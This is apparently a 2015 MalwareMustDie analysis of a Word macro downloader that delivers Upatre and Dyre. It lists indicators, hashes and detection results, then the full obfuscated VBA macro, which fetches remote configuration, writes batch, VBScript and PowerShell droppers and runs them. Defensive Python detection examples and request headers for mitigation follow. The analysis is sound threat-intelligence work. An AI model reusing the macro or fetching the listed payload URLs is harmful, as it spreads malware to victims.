- ## MalwareMustDie! .DOC VB MACRO DOWNLOADER MALWARE
- ## Analyzed: Tue Jul 21 13:37:22 2015 @unixfreaxjp
- ## PCAP snips at https://twitter.com/MalwareMustDie/status/623363680516747264
- ## THE WORDPRESS SITES SERVED AS DOWNLOAD SERVERS:
- www.buck.tv/cms/wp-content/uploads/78672738612836.txt
- www.buck.tv/cms/wp-content/uploads/papa.txt
- www.bereciartua.com//wp-content/themes/bereciartua/78672738612836.txt
- www.bereciartua.com/wp-content/themes/bereciartua/papa.txt
- ## downloaded payload in:
- h00p://195.154.93.8/123a.exe (Upatre/camouflaged as PDF docs 290be6c95016005dc2f0a16c411066d2)
- // check own ip toy: icanhazip.com
- ## downloaded payload in:
- https://[IP-LIST]/teu12.tar (Dyre. PE EXE 9e9cdc46a78c2dfa9220f010d11b53cc)
- (see the IP-LIST section at the end of this post)
- via ssl..
- ## WORD DOC FILE HASHES:
- ## Sample : ./bounty.doc
- ## MD5 : 22b468fc88e8ec7d264b507b0d4df02c
- ## SHA256 : a811a3701e10e227f0ad02fad5bd1200feba6c765c89276541169413524cca85
- ## CURRENT VIRUS CHECK:
- ## Detection ratio: 30 / 55
- ## Analysis date: 2015-07-20 23:37:32 UTC ( 4 hours, 46 minutes ago )
- ## Antivirus Result Update
- ## ALYac W97m.Downloader.UN 20150720
- ## AVG W97M/Generic 20150721
- ## AVware LooksLike.Macro.Malware.gen!d1 (v) 20150720
- ## Ad-Aware W97m.Downloader.UN 20150720
- ## AhnLab-V3 DOC/Downloader 20150720
- ## Arcabit W97m.Downloader.UN 20150720
- ## Avast VBA:Downloader-HH [Trj] 20150720
- ## Avira W97M/Dldr.Agent.71168.B 20150721
- ## BitDefender W97m.Downloader.UN 20150720
- ## Cyren Downloader.QTDD- 20150720
- ## DrWeb W97M.DownLoader.496 20150721
- ## ESET-NOD32 VBA/TrojanDownloader.Agent.XJ 20150720
- ## Emsisoft W97m.Downloader.UN (B) 20150721
- ## F-Prot W97M/Bartallex.C 20150720
- ## F-Secure Trojan:W97M/MaliciousMacro.GEN 20150720
- ## Fortinet WM/Agent!tr 20150720
- ## GData W97m.Downloader.UN 20150720
- ## Ikarus Trojan-Downloader.VBA.Agent 20150720
- ## Kaspersky Trojan-Downloader.VBS.Agent.ank 20150720
- ## McAfee W97M/Downloader.ajz 20150720
- ## McAfee-GW-Edition W97M/Downloader.ajz 20150720
- ## MicroWorld-eScan W97m.Downloader.UN 20150720
- ## Sophos Troj/DocDl-UL 20150721
- ## Symantec W97M.Downloader 20150721
- ## Tencent Vbs.Trojan-downloader.Agent.Hqvk 20150721
- ## TrendMicro W2KM_BARTALEX.XXUB 20150720
- ## TrendMicro-HouseCall W2KM_BARTALEX.XXUB 20150720
- ## VIPRE LooksLike.Macro.Malware.gen!d1 (v) 20150720
- ## ViRobot W97M.S.Agent.71168.B[h] 20150720
- ## nProtect W97m.Downloader.UN 20150720
- ##
- ## THE VB SCRIPT DETECTED IN MACRO
- ##
- ## (Neutralized) VB Macro Code
- ##
- Attribute VB_Name = "Module1"
- Public Function Xjdkhjfwefw(a As Object)
- Xjdkhjfwefw = (a.responseText)
- End Function
- Attribute VB_Name = "Module2"
- Public Function Goabc(sps As String)
- QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- Goabc = Environ(sps)
- End Function
- Public Function Linolium(nbqjbdjqw As String)
- Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
- Dim ashdUHhda As String, hausd As Integer
- ashdUHhda = nbqjbdjqw
- hausd = Sgn(0 - Abs(Cos(140)))
- BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
- 'MsgBox (BQDHJQWDGWQJGS)
- Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
- Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
- Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
- Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
- End Function
- Sub WaitFor(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- Attribute VB_Name = "Module3"
- Public Function India(dnuwhd As String, b As String, c As Integer)
- Dim selectedText As String
- Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
- Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
- HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- With ssjidoqwhduqhwidqwudihq.Find
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- .Text = dnuwhd
- .MatchWholeWord = True
- ssjidoqwhduqhwidqwudihq.Find.Execute
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
- Dim wdwq As String
- Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
- Dim wdsadwq As String
- lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
- .Text = b
- .MatchWholeWord = True
- .Execute
- RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
- RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
- lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
- If (c = 1) Then
- selectedText = lesleslesqjhdjqkwhdwq.Delete
- End If
- If (c = 2) Then
- lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
- End If
- Dim hduwaa As Integer
- hduwaa = 1 - 2 ^ 4
- QHUDW = Chr(33 + Sgn(hduwaa))
- If (c = 3) Then
- With ssjidoqwhduqhwidqwudihq.Find
- .Text = a
- .Replacement.Text = QHUDW
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- Public Function HowEver(a As Variant, b)
- VGQDVHQWD = "h2eh1 fg12e"
- a = Shell(b, 0)
- HowEver = a
- End Function
- ##
- ## MAIN COURSE IS HERE....
- ##
- Attribute VB_Name = "ThisDocument"
- Attribute VB_Base = "1Normal.ThisDocument"
- Attribute VB_GlobalNameSpace = False
- Attribute VB_Creatable = False
- Attribute VB_PredeclaredId = True
- Attribute VB_Exposed = True
- Attribute VB_TemplateDerived = True
- Attribute VB_Customizable = True
- Sub Dqwkdojqwiodqw_Open()
- End Sub
- Sub Ejoqiwjdioqwjdqo_Open()
- End Sub
- Sub Auto_Open()
- Djiqowjdwoiqjdqwo
- End Sub
- Sub Djiqowjdwoiqjdqwo()
- UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
- Xjqwidjowqjdq
- End Sub
- Sub Giqjwdhqwkjq()
- DQUHWDIWQ = "eji21h ui21he21"
- End Sub
- Sub AutoOpen()
- Auto_Open
- End Sub
- Sub Workbook_Open()
- NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
- Auto_Open
- End Sub
- Sub Xjqwidjowqjdq()
- Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
- Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
- BOLIVIA = Chr(90 + 2)
- ANGOLA = Ubqhwdhwqbd(15425) + ""
- SPAIN = Chr(84) & "em" + "p"
- QHDQUWH = ANGOLA
- FL2 = QHDQUWH
- PH2 = Module2.Goabc(SPAIN) + BOLIVIA
- silkroad = 9
- jwnqdw = -1
- BOSNIA = 12312312
- BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
- BALAGAN = BOSNIA
- TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
- JWIDJIAAA = ""
- HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
- QIWJDABB = "b"
- HUYFEA = QIWJDABB + "a" + "t"
- IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
- PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
- gana = NUqwdqwbdsad(1 - 300 * Sin(20))
- SSS = Chr(BALAGAN + 2 + gana)
- VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
- BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
- INTG = "" & "o" & "bject"
- KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
- AFTG = Chr(109) & KIWD
- SXEE = Chr(46)
- SXAA = Chr(101)
- SXE = SXEE & SXAA & "" & "xe"
- GNG = Chr(2 ^ 2 + 42) + "jpg"
- HUQD = Chr(30 + 16 + 1)
- ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
- BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
- ABPTH = PH2 + BAFL
- BAPTH = ABPTH
- JHQKWDQAASS = BQHJDQ
- Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
- DRT = 315
- BFT = 316
- CFT = 317
- DFT = 318
- EFT = 319
- Dim NUWDHUQHUQWDH As String
- NUWDHUQHUQWDH = "USE" & "RPROFILE"
- Dim PBIn As String, asdwq As String, MIWDWQ As String
- TSTS = "." + "t" + "xt"
- CDDD = "78672738612836" + TSTS
- LNSS = "p" & "a" & "p" & "a" & "" + TSTS
- STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
- STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
- PBIn = ATTH + STT1 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = Rasdas(CONT)
- HQUWDAAA = "0"
- If (asdwq <> "=") Then
- PBIn = ATTH + STT2 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- CONT = Quqhwdbyas(asdwq)
- Dim ahuywdgqy As String
- TVT10 = Port(CONT, "t" & "ext10")
- TVT20 = Port(CONT, "t" & "ext20")
- TVT21 = Port(CONT, "t" & "ext21")
- TVT30 = Port(CONT, "t" & "ext30")
- TVT31 = Port(CONT, "t" & "ext31")
- XPT1 = Port(CONT, "stext1")
- XPT2 = Port(CONT, "stext2")
- XPT3 = Port(CONT, "stext3")
- WVR = Module2.Goabc(NUWDHUQHUQWDH)
- hufehu1 = InStr(WVR, "sers\")
- Dim hudhw As Integer
- Dim ghdAdd(1 To 3)
- ghdAdd(1) = "1"
- ghdAdd(2) = "0"
- ghdAdd(3) = "0"
- If (hufehu1 <> 0) Then
- ghdAdd(1) = "2"
- Else
- ghdAdd(2) = "3"
- End If
- JHWQUD = Join(ghdAdd)
- hudhw = Val(JHWQUD)
- Module2.WaitFor (1)
- MIWDWQ = ATTH + STT1 + LNSS
- If (HQUWDAAA = "1") Then
- MIWDWQ = ATTH + STT2 + LNSS
- End If
- SEXX = Module2.Linolium(MIWDWQ)
- PSTB = PBIn + "123123123"
- MSTAR1 = JHQKWDQAASS + "5751812" + GNG
- MSTAR2 = JHQKWDQAASS + "5757956" + GNG
- STAR1 = ATTH + MSTAR1
- STAR2 = ATTH + MSTAR2
- FFQ = "8"
- FF = FFQ + SXE
- If (hudhw = 130) Then
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module2.WaitFor (1)
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- BDDT.WaitFor (1)
- NTH1 = Module3.HowEver(retVal, BAPTH)
- End If
- HUDQG = "';"
- If (hudhw = 200) Then
- ZPQSKD = FL2
- Open PSPTH For Output As #CFT
- Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
- Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
- Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + HUDQG
- Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
- Print #DFT, TVT31
- Close #DFT
- Open BAPTH For Output As #EFT
- Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, ":nqudiiqhdjkashd"
- Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
- Print #EFT, ":nqjdkbjkbdhjqwb"
- Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module2.WaitFor (1)
- NTH2 = Module3.HowEver(retVal, BAPTH)
- End If
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
- NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- Public Function NUqwdqwbdsad(a As Integer)
- NUqwdqwbdsad = Sgn(a)
- End Function
- Public Function Hhqudhqwgyuqwaaa(a As Integer)
- Hhqudhqwgyuqwaaa = Sgn(a)
- End Function
- Public Function Ubqhwdhwqbd(a As Integer)
- Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
- End Function
- Public Function Quqhwdbyas(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
- nudqwd = Log10(100)
- asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
- QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
- Set objXML = CreateObject(QHDHUQW)
- Set objNode = objXML.createElement("b6" + "4")
- objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Quqhwdbyas = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- Public Function Port(a, b As String)
- Dim krd, tent As Integer
- UQWD = "" & Chr(58 + 2)
- NDUW = "" & Chr(70 - 8)
- krd = InStr(1, a, UQWD + b + NDUW) + 8
- tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
- KLMN = Mid$(a, krd, tent)
- HUQHWDA = KLMN
- Port = HUQHWDA
- End Function
- Private Static Function Rasdas(a As String)
- Rasdas = Right(a, 1)
- End Function
- Private Static Function Log10(x)
- SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
- Log10 = Log(x) / Log(10#)
- End Function
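Added example (not part of the original paste or the author's tooling): Python code for triaging a captured response from the download servers the way the macro's `Rasdas`, `Quqhwdbyas` and `Port` routines process it. The sample body is constructed, Python's base64 decoder stands in for the MSXML `bin.base64` node, and the branch-to-file mapping is read off the `hudhw = 130` and `hudhw = 200` blocks above.

```python
import base64

# Sections each branch of Xjqwidjowqjdq() writes, keyed by dropped-file extension.
# hudhw = 200 when USERPROFILE contains "sers\" (C:\Users\...), otherwise 130.
BRANCH_SECTIONS = {
    130: {".bat": ["stext1", "stext2"], ".vbs": ["stext3"]},
    200: {".ps1": ["text10"], ".vbs": ["text30", "text31"],
          ".bat": ["text20", "text21"]},
}

# Constructed, harmless stand-in for a captured response body.
SAMPLE_BODY = base64.b64encode((
    "<text10>ps1-body</text10>"
    "<text20>bat-head</text20><text21>bat-tail</text21>"
    "<text30>vbs-head</text30><text31>vbs-tail</text31>"
).encode()).decode()


def looks_valid(body):
    """Rasdas(): the macro accepts a response only if its last character is '='."""
    return body[-1:] == "="


def decode_blob(body):
    """Quqhwdbyas(): base64-decode the body (stand-in for MSXML bin.base64)."""
    return base64.b64decode(body).decode("latin-1")


def port(blob, tag):
    """Port(): text between <tag> and </tag>.

    The macro adds a fixed 8 to the InStr result, which only fits six-character
    tag names; this version uses the real tag length and returns None when a
    tag is missing instead of failing.
    """
    open_tag, close_tag = f"<{tag}>", f"</{tag}>"
    start, end = blob.find(open_tag), blob.find(close_tag)
    if start < 0 or end < start:
        return None
    return blob[start + len(open_tag):end]


def triage(body, branch):
    """Map each file the given branch would write to the sections it pulls."""
    if not looks_valid(body):
        return None  # the macro would retry against the second server
    blob = decode_blob(body)
    return {ext: [port(blob, tag) for tag in tags]
            for ext, tags in BRANCH_SECTIONS[branch].items()}


if __name__ == "__main__":
    for branch in (130, 200):
        print(branch, triage(SAMPLE_BODY, branch))
```

A `None` entry in the result means the captured body does not carry that section, which tells the analyst which OS branch the served configuration was built for.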
- ##
- ## HTTP HEADER REQUESTS SENT :
- ## (for mitigation)
- GET /cms/wp-content/uploads/78672738612836.txt HTTP/1.1
- Accept-Language: en-us
- Accept: */*
- User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Host: www.buck.tv
- Connection: Keep-Alive
- GET /wp-content/themes/bereciartua/78672738612836.txt HTTP/1.1
- Accept-Language: en-us
- Accept: */*
- User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Host: www.bereciartua.com
- Connection: Keep-Alive
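Added example (not from the original paste): Python detection logic for the two requests above, run over constructed proxy-log lines. The log format, client addresses and the `example.org` / `example.net` hosts are assumptions; the hosts, file names and User-Agent come from this post. The second rule goes beyond the listed hosts and flags any `.txt` fetched from a WordPress content directory with this User-Agent.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from this post.
MACRO_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
KNOWN_HOSTS = {"www.buck.tv", "www.bereciartua.com"}
KNOWN_FILES = {"78672738612836.txt", "papa.txt"}

# Behavioural rule (generalisation): a .txt under wp-content/uploads or /themes.
# The User-Agent alone is not enough, since other WinHTTP clients send it too.
WP_TXT = re.compile(r"/wp-content/(?:uploads|themes)/(?:[^/]+/)*[^/]+\.txt$", re.I)

# Assumed log layout: timestamp client method url status "user-agent"
LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')

# Constructed sample lines.
SAMPLE_LOG = """\
2015-07-21T04:37:01Z 10.0.0.15 GET http://www.buck.tv/cms/wp-content/uploads/78672738612836.txt 200 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
2015-07-21T04:37:03Z 10.0.0.15 GET http://www.bereciartua.com//wp-content/themes/bereciartua/papa.txt 200 "Mozilla/5.0 (Windows NT 6.1)"
2015-07-21T04:38:10Z 10.0.0.22 GET http://blog.example.org/wp-content/uploads/2015/07/notes.txt 200 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
2015-07-21T04:39:00Z 10.0.0.30 GET http://update.example.net/check.xml 200 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
2015-07-21T04:40:00Z 10.0.0.31 GET http://blog.example.org/wp-content/uploads/2015/07/photo.jpg 200 "Mozilla/5.0 (Windows NT 6.1)"
"""


def classify(line):
    """Return (client, rule, url) for a suspicious line, else None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    _ts, client, _method, url, _status, ua = m.groups()
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = re.sub(r"/{2,}", "/", parts.path)  # the post lists one URL with "//"
    name = path.rsplit("/", 1)[-1]
    if host in KNOWN_HOSTS and name in KNOWN_FILES:
        return (client, "ioc", url)        # exact host + file name from the post
    if ua == MACRO_UA and WP_TXT.search(path):
        return (client, "behaviour", url)  # same request shape, different host
    return None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, rule, url in scan(SAMPLE_LOG.splitlines()):
        print(f"{rule:9} {client:10} {url}")
```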
- ##
- ## IP LIST FOR CLEAN UP (SERVES DYRE aka IP-LIST/sorted)
- ## 30 of these IPs are in United States networks.
- ##
- ## MalwareMustDie!